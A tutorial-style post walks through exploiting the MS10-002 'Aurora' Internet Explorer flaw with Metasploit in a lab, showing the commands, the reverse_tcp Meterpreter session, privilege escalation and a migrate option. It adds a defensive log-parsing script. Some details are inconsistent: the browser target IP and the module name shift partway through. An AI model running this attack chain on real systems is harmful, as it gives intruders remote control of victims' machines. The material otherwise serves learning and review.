Aurora vulnerability (MS10-002 penetration steps: building a phishing site with MSF [tested and working])

Published: 2025-12-10 19:16:24   Views: 3


Contents

1. MS10-002 Aurora vulnerability   2. Advanced options

1. MS10-002 Aurora vulnerability


This post briefly describes how to use Metasploit to run a penetration test against MS10-002 (the Aurora vulnerability); for learning purposes only.

Test environment   Description      IP
Attacker host      Kali 2020        192.168.1.113
Target host        Windows XP SP3   192.168.1.106

① Start msf, search for ms10_002, select the exploit module in msf, and set its parameters:

msf6 > search ms10_002

Matching Modules
================

   #  Name                                        Disclosure Date  Rank    Check  Description
   -  ----                                        ---------------  ----    -----  -----------
   0  exploit/windows/browser/ms10_002_aurora     2010-01-14       normal  No     MS10-002 Microsoft Internet Explorer "Aurora" Memory Corruption
   1  exploit/windows/browser/ms10_002_ie_object  2010-01-21       normal  No     MS10-002 Microsoft Internet Explorer Object Memory Use-After-Free

Interact with a module by name or index. For example info 1, use 1 or use exploit/windows/browser/ms10_002_ie_object

msf6 > use 0
[*] No payload configured, defaulting to windows/meterpreter/reverse_tcp
msf6 exploit(windows/browser/ms10_002_aurora) > options

Module options (exploit/windows/browser/ms10_002_aurora):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   SRVHOST  0.0.0.0          yes       The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.0 to listen on all addresses.
   SRVPORT  8080             yes       The local port to listen on.
   SSL      false            no        Negotiate SSL for incoming connections
   SSLCert                   no        Path to a custom SSL certificate (default is randomly generated)
   URIPATH                   no        The URI to use for this exploit (default is random)

Payload options (windows/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST     192.168.1.113    yes       The listen address (an interface may be specified)
   LPORT     4444             yes       The listen port

Exploit target:

   Id  Name
   --  ----
   0   Automatic

msf6 exploit(windows/browser/ms10_002_aurora) > set srvport 80
srvport => 80
msf6 exploit(windows/browser/ms10_002_aurora) > set lport 443
lport => 443
msf6 exploit(windows/browser/ms10_002_aurora) > set uripath /
uripath => /
msf6 exploit(windows/browser/ms10_002_aurora) > exploit
[*] Exploit running as background job 1.
[*] Exploit completed, but no session was created.
[*] Started reverse TCP handler on 192.168.1.113:443
[*] Using URL: http://0.0.0.0:80/
[*] Local IP: http://192.168.1.113:80/
msf6 exploit(windows/browser/ms10_002_aurora) > [*] Server started.


② Metasploit reports that the phishing site is now listening on local port 80. Open the browser on the target machine and enter 192.168.1.106.

③ The attacker host successfully exploits the target and obtains a Meterpreter session:

msf6 exploit(windows/browser/ms10_002_aurora) > [*] Server started.
[*] 192.168.1.109    ms10_002_aurora - Sending MS10-002 Microsoft Internet Explorer "Aurora" Memory Corruption
[*] 192.168.1.109    ms10_002_aurora - Sending MS10-002 Microsoft Internet Explorer "Aurora" Memory Corruption
[*] 192.168.1.109    ms10_002_aurora - Sending MS10-002 Microsoft Internet Explorer "Aurora" Memory Corruption
[*] 192.168.1.109    ms10_002_aurora - Sending MS10-002 Microsoft Internet Explorer "Aurora" Memory Corruption
[*] 192.168.1.106    ms10_002_aurora - Sending MS10-002 Microsoft Internet Explorer "Aurora" Memory Corruption
[*] Sending stage (175174 bytes) to 192.168.1.106
[*] Meterpreter session 1 opened (192.168.1.113:443 -> 192.168.1.106:4278) at 2021-06-07 13:25:17 +0800

msf6 exploit(windows/browser/ms10_002_aurora) > sessions

Active sessions
===============

  Id  Name  Type                     Information             Connection
  --  ----  ----                     -----------             ----------
  1         meterpreter x86/windows  WINXP-1\st21 @ WINXP-1  192.168.1.113:443 -> 192.168.1.106:4278 (192.168.1.106)

msf6 exploit(windows/browser/ms10_002_ie_object) > sessions 1
[*] Starting interaction with 1...

meterpreter > getuid
Server username: WINXP-1\st21
meterpreter > getsystem
...got system via technique 1 (Named Pipe Impersonation (In Memory/Admin)).
meterpreter >
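For anyone reviewing a lab run like this afterwards, the console output is the record of which browser clients were served the exploit page and which one actually checked in. The parser below is an added example, not code from the original post or from Metasploit; it reconstructs that per-host picture from the log lines above, re-typed here as a constructed sample string.

```python
import re
from collections import defaultdict

# Constructed sample: the msfconsole output from the walkthrough above,
# reduced to the lines a reviewer would reconstruct the run from.
SAMPLE_LOG = """\
[*] 192.168.1.109    ms10_002_aurora - Sending MS10-002 Microsoft Internet Explorer "Aurora" Memory Corruption
[*] 192.168.1.109    ms10_002_aurora - Sending MS10-002 Microsoft Internet Explorer "Aurora" Memory Corruption
[*] 192.168.1.109    ms10_002_aurora - Sending MS10-002 Microsoft Internet Explorer "Aurora" Memory Corruption
[*] 192.168.1.109    ms10_002_aurora - Sending MS10-002 Microsoft Internet Explorer "Aurora" Memory Corruption
[*] 192.168.1.106    ms10_002_aurora - Sending MS10-002 Microsoft Internet Explorer "Aurora" Memory Corruption
[*] Sending stage (175174 bytes) to 192.168.1.106
[*] Meterpreter session 1 opened (192.168.1.113:443 -> 192.168.1.106:4278) at 2021-06-07 13:25:17 +0800
"""

# One regex per event type the browser-exploit module logs.
DELIVERY_RE = re.compile(r'^\[\*\] (\d+\.\d+\.\d+\.\d+)\s+(\S+) - Sending ')
STAGE_RE = re.compile(r'^\[\*\] Sending stage \((\d+) bytes\) to (\d+\.\d+\.\d+\.\d+)')
SESSION_RE = re.compile(
    r'^\[\*\] Meterpreter session (\d+) opened \((\S+) -> (\d+\.\d+\.\d+\.\d+):(\d+)\) at (.+)$')

def reconstruct(log_text):
    """Return {victim_ip: record} describing what each client received."""
    hosts = defaultdict(lambda: {"deliveries": 0, "modules": set(),
                                 "stage_bytes": None, "session": None})
    for line in log_text.splitlines():
        m = DELIVERY_RE.match(line)
        if m:                                   # exploit page served to a client
            rec = hosts[m.group(1)]
            rec["deliveries"] += 1
            rec["modules"].add(m.group(2))
            continue
        m = STAGE_RE.match(line)
        if m:                                   # stager connected back, stage sent
            hosts[m.group(2)]["stage_bytes"] = int(m.group(1))
            continue
        m = SESSION_RE.match(line)
        if m:                                   # full session established
            hosts[m.group(3)]["session"] = {
                "id": int(m.group(1)), "handler": m.group(2),
                "victim_port": int(m.group(4)), "opened_at": m.group(5)}
    return dict(hosts)

def compromised_hosts(summary):
    """Victims for which a session opened, as opposed to delivery attempts only."""
    return sorted(ip for ip, rec in summary.items() if rec["session"] is not None)
```

Run against the sample, it shows 192.168.1.109 receiving the exploit page four times without a session opening, which the post itself does not comment on; that is exactly the kind of extra client a post-engagement review should catch.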

2. Advanced options

Use advanced to view the module's advanced options:

msf6 exploit(windows/browser/ms10_002_aurora) > advanced

Module advanced options (exploit/windows/browser/ms10_002_aurora):

   Name                    Current Setting  Required  Description
   ----                    ---------------  --------  -----------
   ContextInformationFile                   no        The information file that contains context information
   DisablePayloadHandler   false            no        Disable the handler code for the selected payload
   EnableContextEncoding   false            no        Use transient context when encoding payloads
   ListenerComm                             no        The specific communication channel to use for this service
   SSLCipher                                no        String for SSL cipher spec - "DHE-RSA-AES256-SHA" or "ADH"
   SSLCompression          false            no        Enable SSL/TLS-level compression
   SendRobots              false            no        Return a robots.txt file if asked for one
   URIHOST                                  no        Host to use in URI (useful for tunnels)
   URIPORT                                  no        Port to use in URI (useful for tunnels)
   VERBOSE                 false            no        Enable detailed status messages
   WORKSPACE                                no        Specify the workspace for this module

Payload advanced options (windows/meterpreter/reverse_tcp):

   Name                         Current Setting  Required  Description
   ----                         ---------------  --------  -----------
   AutoLoadStdapi               true             yes       Automatically load the Stdapi extension
   AutoRunScript                                 no        A script to run automatically on session creation.
   AutoSystemInfo               true             yes       Automatically capture system information on initialization.
   AutoUnhookProcess            false            yes       Automatically load the unhook extension and unhook the process
   AutoVerifySessionTimeout     30               no        Timeout period to wait for session validation to occur, in seconds
   EnableStageEncoding          false            no        Encode the second stage payload
   EnableUnicodeEncoding        false            yes       Automatically encode UTF-8 strings as hexadecimal
   HandlerSSLCert                                no        Path to a SSL certificate in unified PEM format, ignored for HTTP transports
   InitialAutoRunScript                          no        An initial script to run on session creation (before AutoRunScript)
   PayloadBindPort                               no        Port to bind reverse tcp socket to on target system.
   PayloadProcessCommandLine                     no        The displayed command line that will be used by the payload
   PayloadUUIDName                               no        A human-friendly name to reference this unique payload (requires tracking)
   PayloadUUIDRaw                                no        A hex string representing the raw 8-byte PUID value for the UUID
   PayloadUUIDSeed                               no        A string to use when generating the payload UUID (deterministic)
   PayloadUUIDTracking          false            yes       Whether or not to automatically register generated UUIDs
   PingbackRetries              0                yes       How many additional successful pingbacks
   PingbackSleep                30               yes       Time (in seconds) to sleep between pingbacks
   PrependMigrate               false            yes       Spawns and runs shellcode in new process
   PrependMigrateProc                            no        Process to spawn and run shellcode in
   ReverseAllowProxy            false            yes       Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOST
   ReverseListenerBindAddress                    no        The specific IP address to bind to on the local system
   ReverseListenerBindPort                       no        The port to bind to on the local system if different from LPORT
   ReverseListenerComm                           no        The specific communication channel to use for this listener
   ReverseListenerThreaded      false            yes       Handle every connection in a new thread (experimental)
   SessionCommunicationTimeout  300              no        The number of seconds of no activity before this session should be killed
   SessionExpirationTimeout     604800           no        The number of seconds before this session should be forcibly shut down
   SessionRetryTotal            3600             no        Number of seconds try reconnecting for on network failure
   SessionRetryWait             10               no        Number of seconds to wait between reconnect attempts
   StageEncoder                                  no        Encoder to use if EnableStageEncoding is set
   StageEncoderSaveRegisters                     no        Additional registers to preserve in the staged payload if EnableStageEncoding is set
   StageEncodingFallback        true             no        Fallback to no encoding if the selected StageEncoder is not compatible
   StagerRetryCount             10               no        The number of times the stager should retry if the first connect fails
   StagerRetryWait              5                no        Number of seconds to wait for the stager between reconnect attempts
   VERBOSE                      false            no        Enable detailed status messages
   WORKSPACE                                     no        Specify the workspace for this module

For example, to migrate into another process immediately after the connection to the target comes back, so that the session is not lost if the exploited process is killed:

msf6 exploit(windows/browser/ms10_002_aurora) > set autorunscript migrate -f
autorunscript => migrate -f